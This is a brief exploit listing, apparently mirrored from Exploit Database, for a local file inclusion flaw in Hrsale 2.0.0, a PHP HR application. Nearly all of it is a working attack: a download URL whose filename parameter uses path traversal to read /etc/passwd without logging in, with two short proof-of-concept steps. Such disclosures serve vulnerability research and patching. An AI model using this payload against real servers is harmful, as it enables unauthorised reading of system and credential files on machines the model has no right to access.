Hrsale 2.0.0 – Local File Inclusion

• Exploit Database
• 117 阅读

• 作者： Sosecure
  日期： 2020-10-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48920/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  # Exploit Title: Hrsale 2.0.0 - Local File Inclusion # Date: 10/21/2020 # Exploit Author: Sosecure # Vendor Homepage: https://hrsale.com/index.php # Version: version 2.0.0   Description: This exploit allow you to download any readable file from server with out permission and login session.   Payload : https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd POC:   1.Access to HRsale application and browse to download path with payload 2.Get /etc/passwd